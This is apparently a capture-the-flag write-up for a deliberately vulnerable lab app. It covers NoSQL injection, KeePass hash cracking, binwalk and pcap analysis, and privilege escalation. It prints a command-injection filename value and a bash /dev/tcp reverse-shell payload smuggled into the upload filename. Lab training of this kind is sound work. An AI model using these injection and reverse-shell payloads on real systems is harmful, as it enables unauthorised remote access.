ChallengeWriteup

Day 6 Challenge Writeups

Cover Image for Day 6 Challenge Writeups
Team
Team

Vulnbydefault Day 6 Writeup

On opening the site url we have got this interface

Pasted Image

Lets register a user on register page

Pasted Image

Lets login with that user

Pasted Image

We have got dashboard. It has functionality of uploading files

Pasted Image

Lets upload a file

Pasted Image

Lets check the cookie

Pasted Image

Flag 1

There is a data cookie lets check it Use this site

Pasted Image

Flag 2

lets check the login endpoint

Pasted Image

Lets test nosql Injection

Pasted Image

We got admin access

Pasted Image

Flag 3

Admin user already has 3 files

Lets check first file keepass file

Pasted Image

It has password on it

Lets use keepass2john to get the hash of file

Pasted Image

save it without first part which contain filename copy all the stuff after first colon :

Pasted Image

Pasted Image

It has two enteries Lets check the secret db entry

Pasted Image

Flag 3

Pasted Image

root pass entry has nothing useful

Pasted Image

Lets check other files from admin dashboard

use this command change the cookie part from command

curl -H 'Cookie: session=<value>'  http://IP:PORT/download/street.jpg -o street.jpg

Pasted Image

we would use binwalk to check the hidden data

binwalk -e street.jpg

Pasted Image

lets check the extraction folder

Pasted Image

developer password

lets check another file from admin dashboard

Use the following command to get that file change the value in this command

curl -H 'Cookie: session=<value>'  http://127.0.0.1:8002/download/dump.pcapng -o dump.pcapng

Pasted Image

Lets open this file in wireshark

Pasted Image

Lets check the protocol hierarchy

Pasted Image

use http filter to filter out the http traffic

Pasted Image

Lets follow the tcp stream

Pasted Image

Alright we got the password

Pasted Image

RCE

lets check the upload request

Pasted Image

Lets check for command injection in filename

filename="trap.txt; sleep 10"

Pasted Image

As you can see the request come after 10 sec This confirms that we have rce in this field

Lets make reverse shell payload

filename="trap.txt;bash -c 'bash -i >&/dev/tcp/ngrok/port 0>&1'"

Pasted Image

we got reverse shell

Pasted Image

Lets check the application which are running on this machine

Pasted Image

we have mongodb running

lets use mongosh to access mongodb

mongosh

Flag 5

Pasted Image

Lets check the users collection

Pasted Image

alright we got the admin user password

Flag 6

lets use the password we got from dump file

developer:Ikn0wyw0uldc0meh3r3

Pasted Image

user.txt

Lets use the password from database for admin

Pasted Image

admin:r00tm31fy0uc4n123

Pasted Image

root.txt

Lets check the sudo privileges for admin user

Pasted Image

Lets check the mail for admin user

Pasted Image

Use this password for root part root:1fy0ukn0wy0ukn0w

Pasted Image

RCE Discussion

I know most the people would say why there is rce in filename

Let me show you source code

Pasted Image

This check for zipslip vulnerability which lead user to arbitrary write

For more information read the following blog:

https://security.snyk.io/research/zip-slip-vulnerability

Day 5 Challenge Writeups

Day 7 Challenge Writeups